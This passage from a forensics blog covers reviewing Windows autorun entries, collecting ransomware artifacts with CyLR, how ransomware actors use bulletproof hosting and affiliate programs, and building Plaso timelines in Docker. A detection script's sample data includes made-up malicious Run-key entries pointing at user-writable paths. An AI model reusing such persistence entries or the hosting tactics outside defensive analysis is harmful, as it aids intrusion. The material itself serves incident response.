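            reasons.append("runs-from-user-writable-path")
        if reasons:
            findings.append((name, expanded, reasons))
    return findings


SAMPLE_ENV = profile_env("noransom")
SAMPLE_EXTRA = {"MALWARE": r"%APPDATA%\svc\updater.exe"}   # assumed: found in HKCU\Environment
SAMPLE_RUN = {                                             # constructed Run-key values
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "Updater": r"%MALWARE%",
    "Loader": r'"%TEMP%\x.exe" -q',
    "Chained": r"%STAGE%\run.bat",
}

if __name__ == "__main__":
    for name, cmd, why in review_autoruns(SAMPLE_RUN, SAMPLE_ENV, SAMPLE_EXTRA):
        print(f"{name}: {cmd}  [{'; '.join(why)}]  -> open {to_mount(cmd)}")
```

The point of keeping the expanded paths in the victim's form is that Run-key values, scheduled-task actions and shortcut targets stored as literals (C:\Users\noransom\...) and those stored through variables (%APPDATA%\...) end up comparable; only at the moment you open a file do you rewrite the drive letter onto the mount.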
- Ransomware Analysis: A Examiner’s Guide
When it comes to forensic analysis, Windows is an incredibly revealing operating system. It leaves behind numerous traces that can provide critical insights into ransomware incidents.

Windows Event Logs (WEL)
Windows Event Logs are a treasure trove of information for forensic analysis. They record a wide range of events, from logons and logoffs to application crashes and security incidents. By analyzing these logs, you can reconstruct a timeline of activities and identify potential indicators of compromise.

Endpoint Detection & Response (EDR)
Many organizations rely heavily on EDR during incident response because of the depth of insight it provides. While EDR is crucial, remember to collect artifacts beyond what EDR offers.

File and Folder Access
Windows keeps detailed records of file and folder access. Every time a user accesses a file, several forensic artifacts are created, documenting what was accessed, when, and where it was located. These artifacts are invaluable for understanding the scope and impact of an incident.

NTFS Metadata
Analyzing NTFS metadata, such as $MFT, $UsnJrnl:$J, and $LogFile, can reveal a lot about the activities that occurred within the Windows file system. These metadata files track changes to files and directories, helping you piece together what happened during the ransomware attack.

Registry Hives
The Windows registry is a central repository for configuration data. Collecting and analyzing registry hive files is essential for identifying persistence techniques.

Evidence of Execution
Prefetch files, UserAssist entries, ShimCache, and Amcache. These artifacts can show what programs were run, when they were run, and even how often they were executed.

Web Browser Databases
Web browsers store a wealth of information, including search history, bookmarks, downloads, and more. Analyzing browser databases can provide insights into an attacker's online activities, such as searching for specific tools or visiting malicious websites.
The most common artifacts that must be collected, which CyLR collects automatically, are listed below.

Tools: I personally prefer KAPE, but CyLR is another very useful tool for collecting forensic artifacts. It can be configured to gather a wide range of files and logs from a Windows system, and its default collection paths are a good starting point for your analysis. Check it out: https://github.com/orlikoski/CyLR#windows

About the tool: CyLR, short for Cyber Live Response, is an open-source collection tool developed to assist forensic analysts and incident responders. It automates the collection of critical system artifacts, reducing collection time. CyLR supports both Windows and Linux environments, making it versatile for various incident response scenarios.

How to Use CyLR
Using CyLR is straightforward. Here's a step-by-step guide:
Download and prepare: download CyLR, extract it, and copy it to a USB drive, a network location reachable from the target, or a secure location on your forensic workstation.
Deploy on the target system: insert the USB drive into the compromised system and open a command prompt with administrative privileges (CyLR reads the raw volume to get at locked files, so it must run elevated).
Run CyLR: navigate to the directory containing CyLR and run
CyLR.exe -o [output_dir] (Windows)
./CyLR -o [output_dir] (Linux)
CyLR collects the artifacts and saves them to the specified output directory.

Outputs: note that a few artifacts will be in raw format, for example $MFT and $LogFile. You have to parse them manually or with other tools; KAPE will do that for you.

Stay prepared, stay vigilant, and let tools be your ally in the fight against ransomware. Akash Patel
- Understanding Ransomware Hosting and Affiliate Programs
Ransomware attacks continue to evolve, and so do the tactics used by ransomware actors. One of the key components in their operations is the infrastructure they use, often hosted on what are known as bulletproof hosting (BPH) sites. In addition to BPH, these actors also use virtual private servers (VPSs) and run sophisticated affiliate programs to expand their reach.

What is Bulletproof Hosting (BPH)?
Bulletproof hosting (BPH) providers offer hosting services without any concern for the type of content being hosted. This makes them ideal for cybercriminals, including ransomware operators, who need to host malicious infrastructure. These providers often operate in countries with lenient privacy policies and no extradition agreements with countries like the United States.
Why BPH? Unlike regular hosting providers that respond to abuse reports, BPH providers ignore them, allowing illegal activity to continue.
Finding BPH: these services are advertised and purchased on darknet forums.
https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021

Virtual Private Servers (VPS)
In addition to BPH, ransomware actors frequently use virtual private servers (VPS) from companies like DigitalOcean and Vultr. These servers offer more flexibility and anonymity.
How it works: attackers spin up a VPS, use it for a few attacks, and then shut it down to avoid detection. This process is repeated multiple times.
Identifying VPS: a whois lookup on an IP address used by attackers can reveal its VPS origin. For instance, Vultr addresses are announced under Choopa autonomous system numbers (ASNs), recognizable by the "CHOOPA-ASN" prefix in the whois record.

Ransomware Affiliate Programs
Ransomware groups have professionalized their operations by creating affiliate programs. These programs are similar to business partnerships where the ransomware developers and affiliates share profits from successful attacks.
Evolution: initially, these programs were informal partnerships. Today, they are structured programs managed by project managers.
Rules and marketing: ransomware groups often provide specific rules for their affiliates and market their programs to attract skilled partners.

Example: Notable Ransomware Affiliate Programs
One of the well-known ransomware groups with an affiliate program is BlackCat/ALPHV. Their affiliate program is frequently cited as a sophisticated example of how ransomware operations are run like businesses.
BlackCat/ALPHV: this group offers a well-structured affiliate program. For more detailed information, read Group-IB's analysis "Fat Cats: An analysis of the BlackCat ransomware affiliate program": https://www.group-ib.com/blog/blackcat/

Conclusion
By staying informed about these tactics and adopting strong security practices, organizations can better protect themselves against these evolving threats. Akash Patel
- Running Plaso/Log2Timeline on Windows
In my previous blog, A Deep Dive into Plaso Log2Timeline Forensic Tools, I covered how to use Plaso Log2Timeline on Ubuntu and parse the timeline. However, Ubuntu might not be feasible for everyone, so in this post we'll discuss how to run Plaso on Windows. All parser names and command-line options are the same as in the previous blog.
Blog link: https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools

Getting Started with Docker Desktop
To run Plaso/Log2Timeline on Windows, you'll need Docker Desktop. Follow these steps to get started:
Download Docker Desktop.
Install Docker: no need to sign in. Follow the installation prompts and configure it as you would any other application.

Installing Plaso with Docker
There are two ways to install Plaso with Docker:
Manual installation: follow the documentation: https://plaso.readthedocs.io/en/latest/sources/user/Installing-with-docker.html
Docker pull: pull the official image directly with docker pull log2timeline/plaso (the same image name is used in every command below).
Choose the method that suits you best.

Testing Your Plaso Docker Image
To test the image, run the following in PowerShell (ensure Docker is running with administrator privileges):
docker run log2timeline/plaso log2timeline.py --version
If you get a version string back, Plaso is running successfully.

Let's start with the main stuff :)

Collecting Artifacts
The first step in analysis is to collect artifacts. I recommend using KAPE, which simplifies the process. If possible, collect the data in .vhdx format.
Mount the drive: after collecting the artifacts, mount the VHDX so the collected tree is visible as a drive letter.

Analysis Methods
Once collection is done you can parse and analyze the artifacts in two ways:
1. Parse all artifacts separately using Eric Zimmerman's tools, then collect all outputs into one .plaso file for analysis. This method is time-consuming but effective.
2. Parse most artifacts with Plaso and parse the $MFT with Eric Zimmerman's MFTECmd, then merge the two into one storage file. Plaso can parse the $MFT itself, but I prefer MFTECmd for it.
We will proceed with the second method.
1. Parsing Artifacts with Plaso
To parse everything except the $MFT, run the following in PowerShell:
docker run -v E:/C:/data -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers '!mft,!usnjrnl,!filestat' --hashers md5 --status_view window --storage_file /output/akash.plaso /data
Explanation:
-v E:/C:/data: maps the host directory E:\C (the collected C: volume on the mounted E: drive) to /data inside the container. Docker bind mounts use forward slashes, so E:\C is written E:/C.
-v D:/Plaso:/output: maps the host directory D:\Plaso to /output inside the container.
log2timeline/plaso: the Docker image.
log2timeline.py: the command to run inside the container.
--parsers '!mft,!usnjrnl,!filestat': excludes the MFT, USN journal and filestat parsers. The MFT is handled by MFTECmd in the next step; $UsnJrnl and filestat are excluded because they would duplicate file-system timestamps that MFTECmd already provides.
--hashers md5: computes an MD5 hash of each file processed.
--status_view window: shows progress in a windowed status view.
--storage_file /output/akash.plaso: the output storage file, written to the container path /output (so D:\Plaso on the host).
/data: the source directory inside the container.
This runs Plaso over the contents of E:\C and writes the result to D:\Plaso\akash.plaso.
2. Parsing the $MFT with MFTECmd
To parse the $MFT with MFTECmd, run the following in CMD:
MFTECmd.exe --body D:\Plaso --bodyf HOSTNAME.mft.bodyfile --bdl C -f "E:\C\$MFT"
Explanation:
--body D:\Plaso: the directory the bodyfile is written to.
--bodyf HOSTNAME.mft.bodyfile: the file name to use inside that directory (replace HOSTNAME with the host being examined).
--bdl C: the drive letter to prefix paths with in the bodyfile; use the letter the $MFT came from on the victim (C here), not the letter it is mounted under on your workstation.
-f "E:\C\$MFT": path to the collected $MFT.
A quoting caveat: the command above is for CMD. If you run it from PowerShell instead, write the path in single quotes ('E:\C\$MFT'); inside double quotes PowerShell expands $MFT as a variable and the path silently becomes E:\C\.
3.
Adding MFT Data to the Plaso File
Now parse the MFT bodyfile and add its events to the existing storage file (akash.plaso in my case) with the following command:
(PowerShell) docker run -v D:/Plaso:/output log2timeline/plaso log2timeline.py --parsers 'mactime' --hashers md5 --status_view window --storage_file /output/akash.plaso /output/HOSTNAME.mft.bodyfile
Explanation:
docker run: starts a Docker container.
-v D:/Plaso:/output: mounts the host directory D:\Plaso at /output inside the container, so both the existing akash.plaso and the bodyfile are visible to Plaso.
log2timeline/plaso: the Docker image.
log2timeline.py: the command to run inside the container.
--parsers 'mactime': use only the bodyfile (mactime format) parser. Depending on your Plaso release this parser is listed as mactime or as bodyfile; check the exact name with log2timeline.py --parsers list if the command complains about an unknown parser.
--hashers md5: uses MD5 hashing.
--status_view window: sets the status view type.
--storage_file /output/akash.plaso: the existing storage file; pointing log2timeline at a storage file that already exists adds a new session to it rather than overwriting it.
/output/HOSTNAME.mft.bodyfile: the input bodyfile from MFTECmd.
You now have a single akash.plaso that contains the MFT data as parsed by MFTECmd together with every other artifact parsed by the log2timeline parsers. From here you can load the output into Elasticsearch or any other tool you prefer, or convert it to CSV for analysis in Timeline Explorer.
4.
Importing the Plaso File into Elasticsearch for Timesketch
To push the Plaso file into Elasticsearch for use with Timesketch, use the following command:
(PowerShell) docker run -v D:/Plaso:/output log2timeline/plaso psort.py -o elastic --index_name example_host --server 127.0.0.1 --port 9200 /output/akash.plaso
One networking caveat: inside the container, 127.0.0.1 is the container itself, not your Windows host. If Elasticsearch is running on the host, use --server host.docker.internal (the host alias Docker Desktop provides); if it is running in another container, use that container's name or IP.
Alternatively, use the Timesketch importer (a separate Python client installed on the host, not part of the Plaso image):
timesketch_importer -u [username] -p [password] --host http://127.0.0.1 --index_name HOSTNAME --sketch_name EXAMPLE --timeline_name HOSTNAME /output/akash.plaso
Because this runs on the host rather than in the container, give it the Windows path to the storage file (D:\Plaso\akash.plaso) instead of the container path /output/akash.plaso.
4.1 Exporting to CSV for Timeline Explorer
You can also convert akash.plaso into a CSV for analysis with Timeline Explorer:
(PowerShell) docker run -v D:/Plaso:/output log2timeline/plaso psort.py --output-time-zone UTC -o l2tcsv -w /output/timeline.csv /output/akash.plaso
Explanation:
docker run: starts a Docker container.
-v D:/Plaso:/output: mounts the host directory D:\Plaso at /output inside the container.
log2timeline/plaso: the Docker image.
psort.py: the command to run inside the container (psort sorts and exports the storage file; log2timeline only creates it).
--output-time-zone UTC: the time zone the timestamps are written in. Keep it UTC unless you have a reason to convert, so it matches the other artifacts.
-o l2tcsv: the log2timeline CSV output format, which Timeline Explorer reads directly.
-w /output/timeline.csv: the file to write, which appears on the host as D:\Plaso\timeline.csv.
/output/akash.plaso: the storage file being converted.
Additional Notes
For details on options such as restricting the output to a time range, selecting parsers, and applying filters, refer to my previous blog; the same options apply when Plaso runs in Docker, you only need to adjust the paths to the container mount points. https://www.cyberengage.org/post/a-deep-dive-into-plaso-log2timeline-forensic-tools
By following these steps you can run Plaso on Windows and perform a complete timeline analysis. Happy analyzing! Akash Patel
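As an added example (not from the original post and not part of the Plaso or MFTECmd projects), the whole procedure above, collected into one PowerShell script that runs steps 1 to 4.1 in order and stops at the first failing step. The evidence path E:\C, the output path D:\Plaso, the MFTECmd location C:\Tools\MFTECmd.exe, the host name and the parser name mactime are assumptions taken from the examples in the post; override them with the script's parameters to match your case. It assumes Docker Desktop is running and the .vhdx is already mounted.

```powershell
# Added example wrapping the Plaso-on-Windows steps described above.
# All default paths and names below are assumptions; pass your own as parameters.
param(
    [string]$EvidenceDir = 'E:\C',                 # collected C: volume on the mounted VHDX (assumption)
    [string]$OutDir      = 'D:\Plaso',             # host directory for the storage file and CSV (assumption)
    [string]$HostName    = 'HOSTNAME',             # used in the bodyfile and output file names
    [string]$MftecmdPath = 'C:\Tools\MFTECmd.exe', # where MFTECmd.exe lives on this workstation (assumption)
    [string]$BodyParser  = 'mactime',              # 'mactime' or 'bodyfile' depending on the Plaso release
    [string]$Image       = 'log2timeline/plaso'
)

$ErrorActionPreference = 'Stop'

# Docker bind mounts on Windows take forward slashes: E:\C becomes E:/C
function ConvertTo-DockerHostPath([string]$Path) {
    return (Resolve-Path $Path).Path.TrimEnd('\') -replace '\\', '/'
}

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$evidence = ConvertTo-DockerHostPath $EvidenceDir
$out      = ConvertTo-DockerHostPath $OutDir
$storage  = "/output/$HostName.plaso"            # container path; appears as $OutDir\$HostName.plaso on the host
$bodyfile = "$HostName.mft.bodyfile"

# Step 0: confirm the image runs at all before touching evidence
docker run --rm $Image log2timeline.py --version
if ($LASTEXITCODE -ne 0) { throw 'Plaso image did not run; is Docker Desktop started?' }

# Step 1: everything except the MFT, USN journal and filestat (the MFT is covered by MFTECmd below).
# 'linear' status output is easier to capture in a log than the interactive 'window' view.
docker run --rm -v "${evidence}:/data" -v "${out}:/output" $Image `
    log2timeline.py --parsers '!mft,!usnjrnl,!filestat' --hashers md5 `
    --status_view linear --storage_file $storage /data
if ($LASTEXITCODE -ne 0) { throw 'log2timeline failed on the evidence volume' }

# Step 2: $MFT to bodyfile with MFTECmd. Single quotes keep PowerShell from expanding $MFT.
# --bdl C is the victim's drive letter, not the letter the VHDX is mounted under here.
& $MftecmdPath -f (Join-Path $EvidenceDir '$MFT') --body $OutDir --bodyf $bodyfile --bdl C
if ($LASTEXITCODE -ne 0) { throw 'MFTECmd failed' }

# Step 3: add the bodyfile events to the same storage file (a second session, not an overwrite)
docker run --rm -v "${out}:/output" $Image `
    log2timeline.py --parsers $BodyParser --status_view linear `
    --storage_file $storage "/output/$bodyfile"
if ($LASTEXITCODE -ne 0) { throw 'log2timeline failed on the bodyfile' }

# Step 4.1: export the merged timeline as l2tcsv in UTC for Timeline Explorer
docker run --rm -v "${out}:/output" $Image `
    psort.py --output_time_zone UTC -o l2tcsv -w "/output/$HostName.timeline.csv" $storage
if ($LASTEXITCODE -ne 0) { throw 'psort failed' }

Write-Host "Done: $OutDir\$HostName.plaso and $OutDir\$HostName.timeline.csv"
```

Run it as .\Run-Plaso.ps1 -EvidenceDir 'E:\C' -OutDir 'D:\Plaso' -HostName 'WS01'. The Elasticsearch export (step 4) is left out on purpose because it needs a reachable server; add a psort.py -o elastic call with --server host.docker.internal after step 3 if you want it in the same run.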

